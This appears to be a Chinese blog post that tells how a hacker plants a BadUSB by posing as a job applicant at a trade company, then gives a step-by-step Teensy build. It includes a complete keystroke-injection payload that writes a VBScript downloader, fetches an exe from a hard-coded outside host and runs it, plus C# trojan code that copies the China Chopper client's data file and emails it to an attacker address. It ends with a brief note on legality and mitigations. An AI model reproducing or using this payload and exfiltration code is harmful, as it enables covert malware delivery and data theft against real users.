一个U盘你敢不敢让老农插

黑帽 SEO 培训第二期的最后,大家闲聊时扯到了某黑客为了拿某外贸公司的数据而进行物理渗透的事。

道理很简单:直接去应聘该外贸公司的 SEO 岗位。面试后,很多外贸公司会直接给你一台电脑让你熟悉流程,于是你就有了物理接触对方内网电脑的机会。

外贸公司大部分只有一个局域网;当然,现在也有不少公司划分了多个网段,但目前来说,同一部门处在同一局域网的情况仍居多。

于是,该“黑客”插入了自己特制的 U 盘(实际上是一个模拟键盘的 BadUSB),植入了后门木马,然后拍拍屁股跟对方说“我可能不适合做 SEO”,就走人了。

然后就是远程肉鸡上线,开始进行数据的进一步渗透获取。

今天普及下原理

刚好网上买了个开发板,顺便记录一下。

大佬们跑去找妹子了,只有老农回家带娃,顺便领了快递上楼。

快递包裹就是teensy的开发板

打算烧好代码后,把它包装成 U 盘的样子,到处“浪”。

8.jpg

第一步,安装Arduino IDE

官网:https://www.arduino.cc/en/Main/Software

根据自己的系统下载对应的版本,我的系统是 WIN10,就安装了 APP。注意:Arduino IDE 本身不认识 Teensy,还需要从 pjrc.com 安装 Teensyduino 插件(或在 IDE 的开发板管理器里添加 Teensy),否则“开发板”菜单里不会有 Teensy 选项。

打开界面如下

8.jpg

插入开发板

安装完IDE后,插入你的开发板,运行IDE即可

然后在 IDE 里选择你的开发板型号和 USB Type(要选带 Keyboard 的类型,否则下面代码里的 Keyboard.* 调用无法编译),再编写代码烧入。

8.jpg

恶意代码

GitHub 上有很多这类 payload,例如 Hak5 的 USB Rubber Ducky 脚本库:

https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads

Duckyspark 可以把 Rubber Ducky 的 DuckyScript payload 转换成 Teensy/Arduino 代码:

https://github.com/toxydose/Duckyspark

相关指令

python3 Duckyspark_translator.py [payload.txt] [output_file]

一般普遍用的代码

最常见的 payload 逻辑就是:下载一个文件,然后运行它。

后续的远控、取数据等操作由下载下来的木马程序完成,键盘注入只负责投递。

这里我直接用 FreeBuf 上的一段代码,当然也有其他写法。

8.jpg

https://github.com/lr3800/teensy

int myKeyBreak = 50;   // ms pause after each typed line in setup(); raise it if the target drops keystrokes

/*
 * One-shot keystroke-injection payload: runs once at boot (loop() is empty).
 * Everything below is typed into the host as if by a human at the keyboard:
 *   1. Win+R opens a cmd.exe window that is shrunk to 16x1 characters
 *      (/T:01 sets the console colours, /K keeps the window open after the
 *      mode command) -- presumably to keep it inconspicuous.
 *   2. That window is used to echo a VBScript downloader into K8.vbs line by
 *      line: MSXML2.XMLHTTP GETs the hard-coded HTTP URL and, on status 200,
 *      ADODB.Stream (Type = 1, binary) writes the body to x.exe.
 *   3. "exit" closes the window; cscript runs K8.vbs, the script is deleted,
 *      and x.exe is launched.  All paths are relative, so the files land in
 *      whatever working directory the Run dialog gives cmd (typically the
 *      user's profile folder -- confirm on the target OS version).
 *
 * Defender notes, all visible in the strings below: a console started with
 * `mode CON: COLS=16 LINES=1`, a cmd -> cscript -> x.exe process chain, and the
 * file names K8.vbs / x.exe are the artifacts this payload leaves.  The download
 * is plain HTTP with no integrity check, and the whole chain assumes a
 * logged-in, unlocked Windows desktop where Win+R works and a numpad Alt-code
 * is accepted (see ascii_input()).
 */
void setup() {
  delay(6000);   // wait before typing, presumably so the host finishes enumerating the new HID keyboard
  omg("cmd.exe  /T:01 /K mode CON: COLS=16 LINES=1"); 
  delay(myKeyBreak);
  ascii_println("del x.exe");   // remove any leftover from a previous run
  delay(myKeyBreak);
  // Build K8.vbs one echo at a time: ">" creates/truncates, ">>" appends.
  ascii_println("echo strFileURL = \"http://www.affadsense.com/test.exe\" > K8.vbs");
  delay(myKeyBreak);
  ascii_println("echo strHDLocation = \"x.exe\" >> K8.vbs");
  delay(myKeyBreak);
  ascii_println("echo Set objXMLHTTP = CreateObject(\"MSXML2.XMLHTTP\") >> K8.vbs");
  delay(myKeyBreak);
  ascii_println("echo objXMLHTTP.open \"GET\", strFileURL, false >> K8.vbs");
  delay(myKeyBreak);
  ascii_println("echo objXMLHTTP.send() >> K8.vbs");
  delay(myKeyBreak);
  ascii_println("echo If objXMLHTTP.Status = 200 Then >> K8.vbs");
  delay(myKeyBreak);
  ascii_println("echo Set objADOStream = CreateObject(\"ADODB.Stream\") >> K8.vbs");
  delay(myKeyBreak);
  ascii_println("echo objADOStream.Open >> K8.vbs");
  delay(myKeyBreak);
  ascii_println("echo objADOStream.Type = 1 >> K8.vbs");   // 1 = binary stream
  delay(myKeyBreak);
  ascii_println("echo objADOStream.Write objXMLHTTP.ResponseBody >> K8.vbs");
  delay(myKeyBreak);
  ascii_println("echo objADOStream.Position = 0 >> K8.vbs");
  delay(myKeyBreak);
  ascii_println("echo Set objFSO = Createobject(\"Scripting.FileSystemObject\") >> K8.vbs");
  delay(myKeyBreak);
  ascii_println("echo If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation >> K8.vbs");
  delay(myKeyBreak);
  ascii_println("echo Set objFSO = Nothing >> K8.vbs");
  delay(myKeyBreak);
  ascii_println("echo objADOStream.SaveToFile strHDLocation >> K8.vbs");
  delay(myKeyBreak);
  ascii_println("echo objADOStream.Close >> K8.vbs");
  delay(myKeyBreak);
  ascii_println("echo Set objADOStream = Nothing >> K8.vbs");
  delay(myKeyBreak);
  ascii_println("echo End if >> K8.vbs");
  delay(myKeyBreak);
  ascii_println("echo Set objXMLHTTP = Nothing >> K8.vbs");
  delay(myKeyBreak);
  ascii_println("exit");   // close the tiny console; the script file stays on disk
  delay(1000);
  omg("cmd /c cscript K8.vbs");   // run the downloader from a fresh Run-dialog cmd
  delay(8000);                    // fixed wait for the download; no check that x.exe actually arrived
  omg("cmd /c del K8.vbs");       // remove the script (x.exe is left behind)
  delay(1000);
  omg("cmd /c x.exe");            // launch whatever was downloaded
  delay(10000);
}
// Intentionally empty: the payload is delivered once from setup() and never repeats.
void loop() {
}

/*
 * Type `string` via Alt-codes (see ascii_type_this), then tap Enter so the
 * line is executed by whatever console or dialog currently has focus.
 * The Enter press report and the release report are each held for 100 ms.
 */
void ascii_println(char *string)
{
  ascii_type_this(string);
  for (int phase = 0; phase < 2; ++phase) {
    Keyboard.set_key1(phase == 0 ? KEY_ENTER : 0);   // press, then release
    Keyboard.send_now();
    delay(100);
  }
}


/*
 * Type a NUL-terminated string one character at a time: each character is
 * mapped to its decimal ASCII code by ascii_convert() and keyed in with the
 * Alt+numpad method by ascii_input().  Characters ascii_convert() cannot map
 * are typed by it directly and skipped here (sentinel "000").
 */
void ascii_type_this(char *string)
{
  for (char *cursor = string; *cursor != '\0'; ++cursor) {
    ascii_input(ascii_convert(*cursor));
  }
}

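/*
 * Type one ASCII code with the Windows Alt+numpad method: hold Alt, tap each
 * decimal digit on the numeric keypad, release Alt.  `string` is the digit
 * string produced by ascii_convert() (e.g. "65" for 'A'); the sentinel "000"
 * means "already typed by Keyboard.print()" and is skipped.
 *
 * Fix: the original compared pointers (`string == "000"`), which only works
 * when the compiler happens to pool identical string literals; the contents
 * are compared now.  Non-digit characters are treated exactly as before: no
 * key is set, so an empty report is sent for them.
 *
 * Caveat for the payload author/defender: this relies on the host honouring
 * numpad Alt-codes, i.e. a Windows desktop; it does nothing useful elsewhere.
 */
void ascii_input(const char *string)
{
  if (strcmp(string, "000") == 0) return;

  Keyboard.set_modifier(MODIFIERKEY_ALT);
  Keyboard.send_now();
  for (const char *p = string; *p != '\0'; ++p) {
    switch (*p) {
      case '0': Keyboard.set_key1(KEYPAD_0); break;
      case '1': Keyboard.set_key1(KEYPAD_1); break;
      case '2': Keyboard.set_key1(KEYPAD_2); break;
      case '3': Keyboard.set_key1(KEYPAD_3); break;
      case '4': Keyboard.set_key1(KEYPAD_4); break;
      case '5': Keyboard.set_key1(KEYPAD_5); break;
      case '6': Keyboard.set_key1(KEYPAD_6); break;
      case '7': Keyboard.set_key1(KEYPAD_7); break;
      case '8': Keyboard.set_key1(KEYPAD_8); break;
      case '9': Keyboard.set_key1(KEYPAD_9); break;
      default:  break;   // not produced by ascii_convert(); leave key state untouched
    }
    Keyboard.send_now();     // press report
    Keyboard.set_key1(0);
    delay(11);               // short hold between the press and the release report
    Keyboard.send_now();     // release report (Alt still held)
  }
  // Releasing Alt is what makes Windows commit the accumulated code as a character.
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
}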

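/*
 * Map one character to the decimal string of its ASCII code, which
 * ascii_input() then types with the Windows Alt+numpad method
 * (e.g. 'A' -> "65", ' ' -> "32").
 *
 * Exactly the printable range 32 (' ') .. 126 ('~') is handled -- the same
 * set the original 95-entry if-chain listed (its 'T' entry was duplicated).
 * Any other byte, i.e. control characters or bytes >= 128 such as the parts
 * of a UTF-8 sequence, is handed to Keyboard.print() and the sentinel "000"
 * is returned so ascii_input() types nothing more for it.
 *
 * Returns a pointer into a static buffer that the next call overwrites, so
 * consume it before calling again (ascii_type_this() does).  The sentinel is
 * still the literal "000", so a caller that compares against that literal
 * behaves as before.  The parameter keeps its original name `string`.
 */
char* ascii_convert(char string)
{
  static char digits[4];                                         // up to 3 digits + NUL
  const unsigned code = static_cast<unsigned char>(string);       // byte value, never negative

  if (code < 32 || code > 126) {
    // Outside the Alt-code table: let the Keyboard library type it as-is.
    Keyboard.print(string);
    return "000";
  }

  int n = 0;
  if (code >= 100) {
    digits[n++] = static_cast<char>('0' + code / 100);
  }
  digits[n++] = static_cast<char>('0' + (code / 10) % 10);
  digits[n++] = static_cast<char>('0' + code % 10);
  digits[n] = '\0';
  return digits;
}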

/*
 * Send an all-keys-up report (no modifier, no key) and wait 100 ms so the
 * host sees the release before the next keystroke.  Used by send_keys().
 */
void release_keys()
{
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  delay(100);
}

/*
 * Press one key, optionally with a modifier, hold it for 100 ms and release
 * everything via release_keys() (which adds its own 100 ms pause).
 * A modifier of 0 leaves the current modifier state untouched.
 * Not used by the payload above; kept as a general-purpose helper.
 */
void send_keys(byte key, byte modifier)
{
  if (modifier != 0) {
    Keyboard.set_modifier(modifier);
  }
  Keyboard.set_key1(key);
  Keyboard.send_now();   // press report
  delay(100);
  release_keys();        // release report + pause
}

/*
 * Open the Windows Run dialog with Win+R, type `SomeCommand` into it and
 * press Enter.  The 128 passed to set_modifier is HID modifier bit 7, i.e.
 * the right GUI (Windows) key.  Anything typed here runs as the logged-in
 * user, so this only works on an unlocked desktop.
 */
void omg(char *SomeCommand)
{
  // Win+R: one report with GUI+R held, then one with everything released.
  Keyboard.set_modifier(128);
  Keyboard.set_key1(KEY_R);
  Keyboard.send_now();
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();

  // Let the Run dialog appear and take focus before typing into it.
  delay(1500);
  ascii_type_this(SomeCommand);

  // Enter: press report immediately followed by the release report (no hold delay here).
  for (int phase = 0; phase < 2; ++phase) {
    Keyboard.set_key1(phase == 0 ? KEY_ENTER : 0);
    Keyboard.send_now();
  }
}

烧入过程

8.jpg

点击“验证”(先编译检查)

然后点击“上传”

8.jpg

提示成功后,按一下开发板上的按钮(让 Teensy 进入 bootloader)便烧入了。

8.jpg

这里说下木马里用来获取“中国菜刀”数据文件的那段代码(C#):


// Per the text, this runs repeatedly over the process list (`p` looks like a
// System.Diagnostics.Process, judging by MainModule.FileName).  When the running binary
// is caidao.exe (the "China Chopper" webshell client), the sibling file db.mdb -- the
// client's data file -- is copied to cd.mdb next to it (overwriting any earlier copy)
// and mailed out through a Sendmail helper that is not shown here.
// NOTE(review): File.Copy of a .mdb the client currently has open may fail with a sharing
// violation, and the cd.mdb copy is left on disk beside the original.
if (p.MainModule.FileName.Contains("caidao.exe")) { string s = p.MainModule.FileName.Replace("caidao.exe", "db.mdb"); File.Copy(s, s.Replace("db.mdb", "cd.mdb"), true); Sendmail("admin@affadsense.com", "菜刀来了", s.Replace("db.mdb", "cd.mdb")); }

原理是定期检查进程列表,找到 caidao.exe 后取它所在目录下的数据文件 db.mdb,复制为 cd.mdb,再作为附件发到邮箱。

你的菜刀没打开获取不到?

后台按固定间隔不停地检查进程列表里有没有 caidao.exe 即可。

秀当初的战果

8.jpg

8.jpg

就到这里了

分享的很简单,没什么技术含量,基本等于水文。

这种 BadUSB 的制作还是很简单的,可以做很多的事情。有兴趣的,可以在淘宝买块便宜的开发板玩一下。需要注意:上面这个 payload 依赖目标处于已登录、未锁屏的 Windows 桌面,Win+R 可用,并且能从硬编码的 HTTP 地址下载 exe 直接运行;锁屏、限制未知 USB HID 设备、应用白名单都能直接打断这条链。未经授权在他人设备上使用属于违法行为,只应在授权的测试中使用。

image
